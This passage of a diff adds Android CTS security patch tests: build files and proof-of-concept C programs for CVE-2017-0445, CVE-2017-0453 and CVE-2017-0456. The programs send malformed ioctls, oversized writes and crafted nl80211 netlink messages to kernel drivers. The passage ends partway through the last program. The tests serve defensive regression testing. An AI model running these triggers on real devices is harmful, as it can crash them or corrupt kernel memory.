+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_LOST_AP_SAMPLE_SIZE,
+ 1);
+ nla_put_u32(
+ msg, QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_MIN_BREACHING,
+ 1);
+ nla_put_u32(msg,
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_NUM_AP,
+ 0xaaaaaa9);
+
+ rret1 = nla_nest_start(msg, QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM);
+
+ if (!rret1) {
+ return 1;
+ }
+
+ nla_nest_end(msg, rret1);
+ nla_nest_end(msg, rret);
+
+ ret = nl_send_auto_complete(nl_sk, msg);
+
+ return 0;
+}
+
+#define AID_INET 3003 /* can create AF_INET and AF_INET6 sockets */
+#define AID_NET_RAW 3004 /* can create raw INET sockets */
+#define AID_NET_ADMIN 3005
+
+int test() {
+ int fd = 0;
+ int i = 0;
+ int j = 0;
+ int ret = 0;
+ char *mem;
+ int family_id = 0;
+ struct audio_cal_basic *acb;
+ struct sockaddr_nl saddr;
+ int test = 0x1234;
+ if (getuid() != 0) {
+ return -1;
+ }
+
+ gid_t gid_groups[] = {AID_INET, AID_NET_ADMIN};
+ setgroups(sizeof(gid_groups) / sizeof(gid_groups[0]), gid_groups);
+
+ setuid(2000);
+
+ nl_sk = nl_socket_alloc();
+ ret = genl_connect(nl_sk);
+ if (ret != 0) {
+ return -1;
+ }
+
+ family_id = genl_ctrl_resolve(nl_sk, "nl80211");
+
+#define NL80211_CMD_GET_WIPHY 1
+#define NL80211_CMD_SET_STATION 18
+
+ ret = send_testmode(family_id, getpid(), NL80211_CMD_VENDOR, 1);
+ return 0;
+}
+
+int main(int argc, char *argv[]) { return test(); }
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0445/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0445/Android.mk
new file mode 100644
index 0000000..7cd8622
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0445/Android.mk
@@ -0,0 +1,37 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License
+
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0445
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0445/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0445/poc.c
new file mode 100644
index 0000000..b34b328
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0445/poc.c
@@ -0,0 +1,56 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#define TOUCH_FWU_IOCTL_CODE (0x81)
+#define FW_UPDATE_PROCCESS _IO(TOUCH_FWU_IOCTL_CODE, 1)
+#define FW_FILE_SIZE _IOW(TOUCH_FWU_IOCTL_CODE, 2, uint32_t)
+#define FW_FILE_REQUEST _IO(TOUCH_FWU_IOCTL_CODE, 3)
+#define FW_LOAD_DONE _IO(TOUCH_FWU_IOCTL_CODE, 4)
+#define FW_UPDATE_BYPASS _IO(TOUCH_FWU_IOCTL_CODE, 5)
+
+int main(void) {
+ int fd, ret = 0, cmd;
+ char *buff;
+
+ fd = open("/dev/touch_fwu", O_RDWR);
+ if (fd == -1) {
+ return -1;
+ }
+
+ cmd = FW_FILE_SIZE;
+ ret = ioctl(fd, cmd, 0x100);
+
+ cmd = FW_FILE_REQUEST;
+ ret = ioctl(fd, cmd, 0);
+
+ buff = malloc(0x1000000);
+
+ ret = write(fd, buff, 0x100000);
+
+ close(fd);
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0453/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0453/Android.mk
new file mode 100644
index 0000000..471e72e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0453/Android.mk
@@ -0,0 +1,37 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0453
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+LOCAL_SHARED_LIBRARIES := libnl
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0453/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0453/poc.c
new file mode 100644
index 0000000..999f9d0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0453/poc.c
@@ -0,0 +1,176 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <dlfcn.h>
+#include <errno.h>
+#include <limits.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <jni.h>
+#include <android/log.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <linux/genetlink.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <dirent.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <net/if.h>
+#include <sys/types.h>
+#include <netlink/msg.h>
+#include <netlink/genl/genl.h>
+#include <netlink/genl/ctrl.h>
+#include <linux/nl80211.h>
+
+#define LOG_TAG "nexus6ppppp"
+#define LOG_D(...) \
+ do { \
+ __android_log_print(ANDROID_LOG_ERROR, LOG_TAG, __VA_ARGS__); \
+ printf(__VA_ARGS__); \
+ } while (0)
+
+#define MAX_MSG_SIZE 1024
+#define GENLMSG_DATA(glh) ((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
+#define NLA_DATA(na) ((void *)((char *)(na) + NLA_HDRLEN))
+
+#define KGSL_IOC_TYPE 0x09
+
+struct kgsl_perfcounter_query_compat {
+ unsigned int groupid;
+ unsigned int countables;
+ unsigned int count;
+ unsigned int max_counters;
+ unsigned int __pad[2];
+};
+struct kgsl_perfcounter_read_group {
+ unsigned int groupid;
+ unsigned int countable;
+ unsigned long long value;
+};
+#define IOCTL_KGSL_PERFCOUNTER_QUERY_COMPAT \
+ _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query_compat)
+
+struct kgsl_perfcounter_read_compat {
+ unsigned int reads;
+ unsigned int count;
+ unsigned int __pad[2];
+};
+
+#define CAL_IOCTL_MAGIC 'a'
+
+#define AUDIO_GET_CALIBRATION _IOWR(CAL_IOCTL_MAGIC, 204, void *)
+
+#define NL80211_ATTR_MAC 6
+#define ETH_ALEN 6
+
+struct nl_sock *nl_sk;
+#define NL80211_ATTR_IFINDEX 3
+enum wlan_hdd_tm_attr {
+ WLAN_HDD_TM_ATTR_INVALID = 0,
+ WLAN_HDD_TM_ATTR_CMD = 1,
+ WLAN_HDD_TM_ATTR_DATA = 2,
+ WLAN_HDD_TM_ATTR_STREAM_ID = 3,
+ WLAN_HDD_TM_ATTR_TYPE = 4,
+ WLAN_HDD_TM_ATTR_AFTER_LAST,
+ WLAN_HDD_TM_ATTR_MAX = WLAN_HDD_TM_ATTR_AFTER_LAST - 1,
+};
+
+enum wlan_hdd_tm_cmd {
+ WLAN_HDD_TM_CMD_WLAN_FTM = 0,
+ WLAN_HDD_TM_CMD_WLAN_HB = 1,
+};
+
+int test(void);
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version);
+
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version) {
+ struct nl_msg *msg;
+ int ret = -1;
+ unsigned char dst[ETH_ALEN];
+ struct nlattr *rret;
+ unsigned char oper_classes[253];
+ unsigned char hb_params[800];
+
+ struct nl80211_sta_flag_update flags;
+
+ msg = nlmsg_alloc();
+ int if_index = if_nametoindex("wlan0");
+
+ genlmsg_put(msg, nlmsg_pid, 0, nlmsg_type, 0, 0, genl_cmd, genl_version);
+ nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index);
+ rret = nla_nest_start(msg, NL80211_ATTR_TESTDATA);
+
+ if (!rret) {
+ return 1;
+ }
+
+ nla_put_u32(msg, WLAN_HDD_TM_ATTR_CMD, WLAN_HDD_TM_CMD_WLAN_HB);
+
+ nla_put(msg, WLAN_HDD_TM_ATTR_DATA, sizeof(hb_params), &hb_params);
+
+ nla_nest_end(msg, rret);
+
+ ret = nl_send_auto_complete(nl_sk, msg);
+
+ return 0;
+}
+
+#define AID_INET 3003
+#define AID_NET_RAW 3004
+#define AID_NET_ADMIN 3005
+
+int test() {
+ int fd = 0;
+ int i = 0;
+ int j = 0;
+ int ret = 0;
+ char *mem;
+ int family_id = 0;
+ struct audio_cal_basic *acb;
+ struct sockaddr_nl saddr;
+ int test = 0x1234;
+ if (getuid() != 0) {
+ return -1;
+ }
+
+ gid_t gid_groups[] = {AID_INET, AID_NET_ADMIN};
+ setgroups(sizeof(gid_groups) / sizeof(gid_groups[0]), gid_groups);
+
+ setuid(2000);
+
+ nl_sk = nl_socket_alloc();
+ ret = genl_connect(nl_sk);
+ if (ret != 0) {
+ return -1;
+ }
+
+ family_id = genl_ctrl_resolve(nl_sk, "nl80211");
+
+#define NL80211_CMD_GET_WIPHY 1
+#define NL80211_CMD_SET_STATION 18
+
+ ret = send_testmode(family_id, getpid(), NL80211_CMD_TESTMODE, 1);
+ return 0;
+}
+
+int main(int argc, char *argv[]) { return test(); }
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0456/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0456/Android.mk
new file mode 100644
index 0000000..75cbb98
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0456/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0456
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0456/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0456/poc.c
new file mode 100644
index 0000000..f5c0094
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0456/poc.c
@@ -0,0 +1,564 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <fcntl.h>
+#include <linux/ion.h>
+#include <pthread.h>
+#include <stdint.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#define IPA_IOC_ADD_FLT_RULE 0xc008cf04ul
+
+int main() {
+ int fd;
+
+ fd = open("/dev/ipa", 0x0ul);
+
+ mmap((void *)0x20000000ul, 0xb000ul, 0x3ul, 0x32ul, (int)0xfffffffffffffffful,
+ 0x0ul);
+ memcpy((void *)0x20000ff8, "\x2f\x64\x65\x76\x2f\x69\x70\x61\x00", 9);
+
+ *(uint8_t *)0x20002924 = (uint8_t)0x4;
+ *(uint32_t *)0x20002928 = (uint32_t)0x1;
+ *(uint32_t *)0x2000292c = (uint32_t)0x25;
+ *(uint8_t *)0x20002930 = (uint8_t)0xaf;
+ *(uint8_t *)0x20002931 = (uint8_t)0x5;
+ *(uint8_t *)0x20002934 = (uint8_t)0x3ff;
+ *(uint8_t *)0x20002935 = (uint8_t)0x3000;
+ *(uint32_t *)0x20002938 = (uint32_t)0x0;
+ *(uint32_t *)0x2000293c = (uint32_t)0x100000001;
+ *(uint32_t *)0x20002940 = (uint32_t)0xfff;
+ *(uint16_t *)0x20002944 = (uint16_t)0x10001;
+ *(uint16_t *)0x20002946 = (uint16_t)0x0;
+ *(uint16_t *)0x20002948 = (uint16_t)0x200;
+ *(uint16_t *)0x2000294a = (uint16_t)0x6;
+ *(uint8_t *)0x2000294c = (uint8_t)0x1ff;
+ *(uint8_t *)0x2000294d = (uint8_t)0x0;
+ *(uint8_t *)0x2000294e = (uint8_t)0x4;
+ *(uint8_t *)0x2000294f = (uint8_t)0x4;
+ *(uint32_t *)0x20002950 = (uint32_t)0x4;
+ *(uint16_t *)0x20002954 = (uint16_t)0x4;
+ *(uint16_t *)0x20002956 = (uint16_t)0x5;
+ *(uint32_t *)0x20002958 = (uint32_t)0xe1;
+ *(uint32_t *)0x2000295c = (uint32_t)0x2c3d1303cb45d134;
+ memcpy((void *)0x20002960, "\x85\x76\xe8\x3d\x34\x34", 6);
+ memcpy((void *)0x20002966, "\xc0\x65\x2e\x65\xde\x90", 6);
+ memcpy((void *)0x2000296c, "\x7f\x81\xef\x40\x5f\xa4", 6);
+ memcpy((void *)0x20002972, "\x14\xe8\xa5\x6c\x59\xf3", 6);
+ *(uint16_t *)0x20002978 = (uint16_t)0x7f;
+ *(uint8_t *)0x2000297a = (uint8_t)0x5;
+ *(uint32_t *)0x2000297c = (uint32_t)0x1;
+ *(uint8_t *)0x20002980 = (uint8_t)0x0;
+ *(uint32_t *)0x20002984 = (uint32_t)0x43;
+ *(uint32_t *)0x20002988 = (uint32_t)0x7fff;
+ *(uint32_t *)0x2000298c = (uint32_t)0x1;
+ *(uint32_t *)0x20002990 = (uint32_t)0xb2;
+ *(uint32_t *)0x20002994 = (uint32_t)0x4;
+ *(uint32_t *)0x20002998 = (uint32_t)0x0;
+ *(uint32_t *)0x2000299c = (uint32_t)0x80000000;
+ *(uint32_t *)0x200029a0 = (uint32_t)0x8;
+ *(uint32_t *)0x200029a4 = (uint32_t)0x4;
+ *(uint32_t *)0x200029a8 = (uint32_t)0xab;
+ *(uint32_t *)0x200029ac = (uint32_t)0x1;
+ *(uint32_t *)0x200029b0 = (uint32_t)0x101;
+ *(uint32_t *)0x200029b4 = (uint32_t)0x2;
+ *(uint32_t *)0x200029b8 = (uint32_t)0x170fdfa21d6c58f8;
+ *(uint32_t *)0x200029bc = (uint32_t)0x3dd2;
+ *(uint32_t *)0x200029c0 = (uint32_t)0x4;
+ *(uint16_t *)0x200029c4 = (uint16_t)0xafa1;
+ *(uint8_t *)0x200029c6 = (uint8_t)0x8;
+ *(uint8_t *)0x200029c7 = (uint8_t)0x7;
+ *(uint8_t *)0x200029c8 = (uint8_t)0x80000000;
+ *(uint8_t *)0x200029c9 = (uint8_t)0x100;
+ *(uint8_t *)0x200029ca = (uint8_t)0x7;
+ *(uint8_t *)0x200029cc = (uint8_t)0x6;
+ *(uint16_t *)0x200029ce = (uint16_t)0xbc1;
+ *(uint16_t *)0x200029d0 = (uint16_t)0x7f;
+ *(uint8_t *)0x200029d2 = (uint8_t)0x1;
+ *(uint16_t *)0x200029d4 = (uint16_t)0x8001;
+ *(uint16_t *)0x200029d6 = (uint16_t)0x0;
+ *(uint8_t *)0x200029d8 = (uint8_t)0x7;
+ *(uint8_t *)0x200029dc = (uint8_t)0x10000;
+ *(uint32_t *)0x200029e0 = (uint32_t)0x1f;
+ *(uint32_t *)0x200029e4 = (uint32_t)0x8001;
+ *(uint8_t *)0x200029e8 = (uint8_t)0x1;
+ *(uint32_t *)0x200029ec = (uint32_t)0x20;
+ *(uint32_t *)0x200029f0 = (uint32_t)0x96df;
+ *(uint8_t *)0x200029f4 = (uint8_t)0x3ff;
+ *(uint8_t *)0x200029f5 = (uint8_t)0x0;
+ *(uint8_t *)0x200029f6 = (uint8_t)0x34ee;
+ *(uint32_t *)0x200029f8 = (uint32_t)0x7e;
+ *(uint8_t *)0x200029fc = (uint8_t)0x9;
+ *(uint8_t *)0x200029fe = (uint8_t)0x3000000000;
+ *(uint16_t *)0x20002a00 = (uint16_t)0xf43e;
+ *(uint8_t *)0x20002a02 = (uint8_t)0x200;
+ *(uint8_t *)0x20002a04 = (uint8_t)0x9;
+ *(uint32_t *)0x20002a08 = (uint32_t)0x7ff;
+ *(uint8_t *)0x20002a0c = (uint8_t)0x7;
+ *(uint8_t *)0x20002a10 = (uint8_t)0x2;
+ *(uint32_t *)0x20002a14 = (uint32_t)0xe214;
+ *(uint32_t *)0x20002a18 = (uint32_t)0x8;
+ *(uint8_t *)0x20002a1c = (uint8_t)0x4b;
+ *(uint32_t *)0x20002a20 = (uint32_t)0x0;
+ *(uint32_t *)0x20002a24 = (uint32_t)0x1;
+ *(uint8_t *)0x20002a28 = (uint8_t)0x7;
+ *(uint8_t *)0x20002a29 = (uint8_t)0xffffffffffffff00;
+ memcpy((void *)0x20002a2a,
+ "\xfc\x27\xac\xe4\x96\x49\xb2\xf6\x0d\xbd\x51\x62\x5a\x6b\x3f\xda",
+ 16);
+ memcpy((void *)0x20002a3a,
+ "\x19\x98\xc7\x34\xad\x27\x47\x85\xf1\xc7\x03\x87\xa2\x78\xba\x90",
+ 16);
+ *(uint8_t *)0x20002a4a = (uint8_t)0x5;
+ memcpy((void *)0x20002a4b,
+ "\xf7\xfe\x5a\x93\x7e\x57\x1f\xd9\x22\x2a\xe9\xd3\x26\x97\xde\x2f",
+ 16);
+ memcpy((void *)0x20002a5b,
+ "\xbc\xe1\x51\xd0\xba\x84\x15\xd0\x52\x62\x42\x02\x20\x30\x08\xeb",
+ 16);
+ *(uint8_t *)0x20002a6b = (uint8_t)0x0;
+ *(uint8_t *)0x20002a6c = (uint8_t)0x2;
+ *(uint32_t *)0x20002a70 = (uint32_t)0x1;
+ *(uint32_t *)0x20002a74 = (uint32_t)0x0;
+ *(uint8_t *)0x20002a78 = (uint8_t)0x7;
+ *(uint32_t *)0x20002a7c = (uint32_t)0x7;
+ *(uint8_t *)0x20002a80 = (uint8_t)0x6;
+ *(uint8_t *)0x20002a84 = (uint8_t)0x3f;
+ *(uint32_t *)0x20002a88 = (uint32_t)0xa952;
+ *(uint32_t *)0x20002a8c = (uint32_t)0x5;
+ *(uint8_t *)0x20002a90 = (uint8_t)0x8000;
+ *(uint8_t *)0x20002a91 = (uint8_t)0x400;
+ *(uint32_t *)0x20002a94 = (uint32_t)0x0;
+ *(uint32_t *)0x20002a98 = (uint32_t)0xffff;
+ *(uint32_t *)0x20002a9c = (uint32_t)0x3;
+ *(uint16_t *)0x20002aa0 = (uint16_t)0x2400000000000;
+ *(uint16_t *)0x20002aa2 = (uint16_t)0x7fff;
+ *(uint16_t *)0x20002aa4 = (uint16_t)0x100000000;
+ *(uint16_t *)0x20002aa6 = (uint16_t)0xffffffffffffff68;
+ *(uint8_t *)0x20002aa8 = (uint8_t)0x7621;
+ *(uint8_t *)0x20002aa9 = (uint8_t)0x99;
+ *(uint8_t *)0x20002aaa = (uint8_t)0xefc3;
+ *(uint8_t *)0x20002aab = (uint8_t)0x7fff;
+ *(uint32_t *)0x20002aac = (uint32_t)0x1a845927;
+ *(uint16_t *)0x20002ab0 = (uint16_t)0xffffffffffffff01;
+ *(uint16_t *)0x20002ab2 = (uint16_t)0x4;
+ *(uint32_t *)0x20002ab4 = (uint32_t)0x3;
+ *(uint32_t *)0x20002ab8 = (uint32_t)0x8;
+ memcpy((void *)0x20002abc, "\xec\x77\x0a\x15\x35\xad", 6);
+ memcpy((void *)0x20002ac2, "\x50\x7a\x5c\x89\xda\x6d", 6);
+ memcpy((void *)0x20002ac8, "\x97\x95\x20\x35\x09\xee", 6);
+ memcpy((void *)0x20002ace, "\xd7\x6a\x47\xf0\xb1\x5a", 6);
+ *(uint16_t *)0x20002ad4 = (uint16_t)0x100000000000000;
+ *(uint8_t *)0x20002ad6 = (uint8_t)0xa000000000;
+ *(uint32_t *)0x20002ad8 = (uint32_t)0x40;
+ *(uint8_t *)0x20002adc = (uint8_t)0x20;
+ *(uint32_t *)0x20002ae0 = (uint32_t)0x0;
+ *(uint32_t *)0x20002ae4 = (uint32_t)0x0;
+ *(uint32_t *)0x20002ae8 = (uint32_t)0x6;
+ *(uint32_t *)0x20002aec = (uint32_t)0x8;
+ *(uint32_t *)0x20002af0 = (uint32_t)0x6;
+ *(uint32_t *)0x20002af4 = (uint32_t)0x0;
+ *(uint32_t *)0x20002af8 = (uint32_t)0x8;
+ *(uint32_t *)0x20002afc = (uint32_t)0x3;
+ *(uint32_t *)0x20002b00 = (uint32_t)0x8;
+ *(uint32_t *)0x20002b04 = (uint32_t)0x7;
+ *(uint32_t *)0x20002b08 = (uint32_t)0x7f;
+ *(uint32_t *)0x20002b0c = (uint32_t)0x6;
+ *(uint32_t *)0x20002b10 = (uint32_t)0x800;
+ *(uint32_t *)0x20002b14 = (uint32_t)0x24000000;
+ *(uint32_t *)0x20002b18 = (uint32_t)0x80000001;
+ *(uint32_t *)0x20002b1c = (uint32_t)0x1;
+ *(uint16_t *)0x20002b20 = (uint16_t)0x2;
+ *(uint8_t *)0x20002b22 = (uint8_t)0x80000000;
+ *(uint8_t *)0x20002b23 = (uint8_t)0x9;
+ *(uint8_t *)0x20002b24 = (uint8_t)0x7f;
+ *(uint8_t *)0x20002b25 = (uint8_t)0x9aa2;
+ *(uint8_t *)0x20002b26 = (uint8_t)0x80000001;
+ *(uint8_t *)0x20002b28 = (uint8_t)0x9;
+ *(uint16_t *)0x20002b2a = (uint16_t)0x7;
+ *(uint16_t *)0x20002b2c = (uint16_t)0x1;
+ *(uint8_t *)0x20002b2e = (uint8_t)0x7;
+ *(uint16_t *)0x20002b30 = (uint16_t)0x4;
+ *(uint16_t *)0x20002b32 = (uint16_t)0x9;
+ *(uint8_t *)0x20002b34 = (uint8_t)0x3;
+ *(uint8_t *)0x20002b38 = (uint8_t)0x80000000;
+ *(uint32_t *)0x20002b3c = (uint32_t)0xbe;
+ *(uint32_t *)0x20002b40 = (uint32_t)0x10001;
+ *(uint8_t *)0x20002b44 = (uint8_t)0x8;
+ *(uint32_t *)0x20002b48 = (uint32_t)0x0;
+ *(uint32_t *)0x20002b4c = (uint32_t)0x6;
+ *(uint8_t *)0x20002b50 = (uint8_t)0xe83c;
+ *(uint8_t *)0x20002b51 = (uint8_t)0x9dec;
+ *(uint8_t *)0x20002b52 = (uint8_t)0x100000000000000;
+ *(uint32_t *)0x20002b54 = (uint32_t)0x0;
+ *(uint8_t *)0x20002b58 = (uint8_t)0x4;
+ *(uint8_t *)0x20002b5a = (uint8_t)0x10001;
+ *(uint16_t *)0x20002b5c = (uint16_t)0x14000000000000;
+ *(uint8_t *)0x20002b5e = (uint8_t)0x6;
+ *(uint8_t *)0x20002b60 = (uint8_t)0x9000000;
+ *(uint32_t *)0x20002b64 = (uint32_t)0x100000000;
+ *(uint8_t *)0x20002b68 = (uint8_t)0x0;
+ *(uint8_t *)0x20002b6c = (uint8_t)0x6;
+ *(uint32_t *)0x20002b70 = (uint32_t)0x6;
+ *(uint32_t *)0x20002b74 = (uint32_t)0x80000001;
+ *(uint8_t *)0x20002b78 = (uint8_t)0x10001;
+ *(uint32_t *)0x20002b7c = (uint32_t)0x2;
+ *(uint32_t *)0x20002b80 = (uint32_t)0x101;
+ *(uint8_t *)0x20002b84 = (uint8_t)0x115;
+ *(uint8_t *)0x20002b85 = (uint8_t)0x5;
+ memcpy((void *)0x20002b86,
+ "\x10\x72\x8f\xb9\x7d\xe9\x33\x19\x3d\x81\xc1\x54\x31\x91\x1e\xac",
+ 16);
+ memcpy((void *)0x20002b96,
+ "\xcd\x33\x9b\x13\xdc\x4b\xfe\x81\xbf\x15\xaa\x54\xe6\x8f\x9c\xad",
+ 16);
+ *(uint8_t *)0x20002ba6 = (uint8_t)0x1;
+ memcpy((void *)0x20002ba7,
+ "\x08\xf8\x09\x5e\x9c\x9a\xc5\x02\xaa\xc8\xf0\x53\x55\xb3\x72\x3b",
+ 16);
+ memcpy((void *)0x20002bb7,
+ "\x32\xe2\x81\xed\x29\x5a\xbb\xfb\xe3\x98\x81\xa5\x00\x09\x5b\x0b",
+ 16);
+ *(uint8_t *)0x20002bc7 = (uint8_t)0x3ff;
+ *(uint8_t *)0x20002bc8 = (uint8_t)0x10000;
+ *(uint32_t *)0x20002bcc = (uint32_t)0x68;
+ *(uint32_t *)0x20002bd0 = (uint32_t)0x9;
